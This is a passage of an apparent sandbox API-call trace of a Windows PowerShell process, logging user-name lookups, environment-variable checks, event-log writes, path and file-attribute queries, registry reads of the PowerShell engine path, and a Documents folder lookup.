	[0743.866] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0743.866] GetUserNameW (in: lpBuffer=0x4469e0, pcbBuffer=0x26d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d6c8) returned 1
	[0743.866] CoTaskMemFree (pv=0x4469e0) 
	[0743.866] ReportEventW (hEventLog=0x1b970008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ed00e0*="Variable", lpRawData=0x2ecfe70) returned 1
	[0743.893] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0743.893] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.893] CoTaskMemFree (pv=0x4444f0) 
	[0743.894] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0743.894] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.894] CoTaskMemFree (pv=0x4444f0) 
	[0743.916] CoTaskMemAlloc (cb=0x804) returned 0x1b8abbe0
	[0743.916] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8abbe0, nSize=0x26d688 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d688) returned 0x1
	[0743.917] CoTaskMemFree (pv=0x1b8abbe0) 
	[0743.917] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0743.917] GetUserNameW (in: lpBuffer=0x4469e0, pcbBuffer=0x26d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d6c8) returned 1
	[0743.917] CoTaskMemFree (pv=0x4469e0) 
	[0743.917] ReportEventW (hEventLog=0x1b970008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ee3f38*="Certificate", lpRawData=0x2ee3cc8) returned 1
	[0744.093] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0744.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0744.093] CoTaskMemFree (pv=0x4444f0) 
	[0744.094] CoTaskMemAlloc (cb=0x20e) returned 0x3f9900
	[0744.094] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3f9900 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0744.094] CoTaskMemFree (pv=0x3f9900) 
	[0744.095] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0744.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0744.095] CoTaskMemFree (pv=0x4444f0) 
	[0744.095] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0744.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0744.095] CoTaskMemFree (pv=0x4444f0) 
	[0744.110] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0744.110] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0744.110] CoTaskMemFree (pv=0x4444f0) 
	[0744.114] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0744.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0744.115] CoTaskMemFree (pv=0x4444f0) 
	[0744.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0744.116] SetErrorMode (uMode=0x1) returned 0x1
	[0744.116] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d2d0 | out: lpFileInformation=0x26d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0744.116] SetErrorMode (uMode=0x1) returned 0x1
	[0744.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0744.116] SetErrorMode (uMode=0x1) returned 0x1
	[0744.116] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d2d0 | out: lpFileInformation=0x26d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0744.116] SetErrorMode (uMode=0x1) returned 0x1
	[0744.117] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0744.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0744.117] CoTaskMemFree (pv=0x4444f0) 
	[0744.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0745.382] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26d080, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0745.382] SetErrorMode (uMode=0x1) returned 0x1
	[0745.382] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d290 | out: lpFileInformation=0x26d290*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0745.382] SetErrorMode (uMode=0x1) returned 0x1
	[0745.382] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26d080, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0745.382] SetErrorMode (uMode=0x1) returned 0x1
	[0745.383] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d290 | out: lpFileInformation=0x26d290*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0745.383] SetErrorMode (uMode=0x1) returned 0x1
	[0745.383] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26d090, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0745.383] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0745.383] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0745.383] SetErrorMode (uMode=0x1) returned 0x1
	[0745.383] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d290 | out: lpFileInformation=0x26d290*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0745.383] SetErrorMode (uMode=0x1) returned 0x1
	[0745.383] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0745.384] SetErrorMode (uMode=0x1) returned 0x1
	[0745.384] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d290 | out: lpFileInformation=0x26d290*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0745.384] SetErrorMode (uMode=0x1) returned 0x1
	[0745.384] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0745.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x26cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0745.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0745.384] SetErrorMode (uMode=0x1) returned 0x1
	[0745.385] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d290 | out: lpFileInformation=0x26d290*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0745.385] SetErrorMode (uMode=0x1) returned 0x1
	[0745.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0745.385] SetErrorMode (uMode=0x1) returned 0x1
	[0745.385] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d290 | out: lpFileInformation=0x26d290*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0745.385] SetErrorMode (uMode=0x1) returned 0x1
	[0745.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0745.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x26cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0745.386] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0745.386] SetErrorMode (uMode=0x1) returned 0x1
	[0745.386] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d2d0 | out: lpFileInformation=0x26d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0745.386] SetErrorMode (uMode=0x1) returned 0x1
	[0745.386] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0745.386] SetErrorMode (uMode=0x1) returned 0x1
	[0745.386] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d2d0 | out: lpFileInformation=0x26d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0745.387] SetErrorMode (uMode=0x1) returned 0x1
	[0745.387] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0745.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x26cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0745.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0745.387] SetErrorMode (uMode=0x1) returned 0x1
	[0745.387] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d2d0 | out: lpFileInformation=0x26d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0745.387] SetErrorMode (uMode=0x1) returned 0x1
	[0745.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0745.388] SetErrorMode (uMode=0x1) returned 0x1
	[0745.388] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d2d0 | out: lpFileInformation=0x26d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0745.388] SetErrorMode (uMode=0x1) returned 0x1
	[0745.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0745.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x26cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0745.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0745.391] SetErrorMode (uMode=0x1) returned 0x1
	[0745.391] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d590 | out: lpFileInformation=0x26d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0745.391] SetErrorMode (uMode=0x1) returned 0x1
	[0745.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0745.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0745.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0745.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0746.789] CoTaskMemAlloc (cb=0x804) returned 0x1b8abbe0
	[0746.789] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8abbe0, nSize=0x26d8f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d8f8) returned 0x1
	[0746.789] CoTaskMemFree (pv=0x1b8abbe0) 
	[0746.789] CoTaskMemAlloc (cb=0x204) returned 0x4469e0
	[0746.790] GetUserNameW (in: lpBuffer=0x4469e0, pcbBuffer=0x26d938 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d938) returned 1
	[0746.790] CoTaskMemFree (pv=0x4469e0) 
	[0746.790] ReportEventW (hEventLog=0x1b970008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d574f8*="Available", lpRawData=0x2d57288) returned 1
	[0748.138] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0748.138] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.138] CoTaskMemFree (pv=0x4444f0) 
	[0748.138] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0748.138] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.139] CoTaskMemFree (pv=0x4444f0) 
	[0748.141] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0748.141] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0748.141] CoTaskMemFree (pv=0x4444f0) 
	[0748.141] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0748.141] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0748.141] CoTaskMemFree (pv=0x4444f0) 
	[0748.143] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d918 | out: phkResult=0x26d918*=0x378) returned 0x0
	[0748.143] RegQueryValueExW (in: hKey=0x378, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d89c, lpData=0x0, lpcbData=0x26d898*=0x0 | out: lpType=0x26d89c*=0x1, lpData=0x0, lpcbData=0x26d898*=0x56) returned 0x0
	[0748.143] CoTaskMemAlloc (cb=0x5a) returned 0x1b890700
	[0748.143] RegQueryValueExW (in: hKey=0x378, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d86c, lpData=0x1b890700, lpcbData=0x26d868*=0x56 | out: lpType=0x26d86c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d868*=0x56) returned 0x0
	[0748.143] CoTaskMemFree (pv=0x1b890700) 
	[0748.143] RegCloseKey (hKey=0x378) returned 0x0
	[0748.145] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0748.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.145] CoTaskMemFree (pv=0x4444f0) 
	[0748.160] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0748.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.160] CoTaskMemFree (pv=0x4444f0) 
	[0748.167] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0748.168] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.168] CoTaskMemFree (pv=0x4444f0) 
	[0748.168] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0748.168] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.168] CoTaskMemFree (pv=0x4444f0) 
	[0748.169] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0748.169] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.169] CoTaskMemFree (pv=0x4444f0) 
	[0748.170] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0748.170] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.170] CoTaskMemFree (pv=0x4444f0) 
	[0748.171] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0748.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.172] CoTaskMemFree (pv=0x4444f0) 
	[0748.172] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0748.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.172] CoTaskMemFree (pv=0x4444f0) 
	[0748.204] CoTaskMemAlloc (cb=0x104) returned 0x4444f0
	[0748.204] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4444f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0748.204] CoTaskMemFree (pv=0x4444f0) 
	[0750.699] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x444930
	[0750.702] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x444a40
	[0757.620] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0757.620] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0757.620] CoTaskMemFree (pv=0x444b50) 
	[0757.624] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0757.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0757.625] CoTaskMemFree (pv=0x444b50) 
	[0757.641] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26da78 | out: phkResult=0x26da78*=0x39c) returned 0x0
	[0757.641] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d9fc, lpData=0x0, lpcbData=0x26d9f8*=0x0 | out: lpType=0x26d9fc*=0x1, lpData=0x0, lpcbData=0x26d9f8*=0x56) returned 0x0
	[0757.641] CoTaskMemAlloc (cb=0x5a) returned 0x466390
	[0757.641] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d9cc, lpData=0x466390, lpcbData=0x26d9c8*=0x56 | out: lpType=0x26d9cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d9c8*=0x56) returned 0x0
	[0757.641] CoTaskMemFree (pv=0x466390) 
	[0757.641] RegCloseKey (hKey=0x39c) returned 0x0
	[0757.641] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26da78 | out: phkResult=0x26da78*=0x39c) returned 0x0
	[0757.641] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d9fc, lpData=0x0, lpcbData=0x26d9f8*=0x0 | out: lpType=0x26d9fc*=0x1, lpData=0x0, lpcbData=0x26d9f8*=0x56) returned 0x0
	[0757.641] CoTaskMemAlloc (cb=0x5a) returned 0x466390
	[0757.641] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d9cc, lpData=0x466390, lpcbData=0x26d9c8*=0x56 | out: lpType=0x26d9cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d9c8*=0x56) returned 0x0
	[0757.641] CoTaskMemFree (pv=0x466390) 
	[0757.642] RegCloseKey (hKey=0x39c) returned 0x0
	[0758.839] CoTaskMemAlloc (cb=0x20c) returned 0x1b8723b0
	[0758.839] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8723b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0758.841] CoTaskMemFree (pv=0x1b8723b0) 
	[0758.841] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0758.841] CoTaskMemAlloc (cb=0x20c) returned 0x1b8723b0
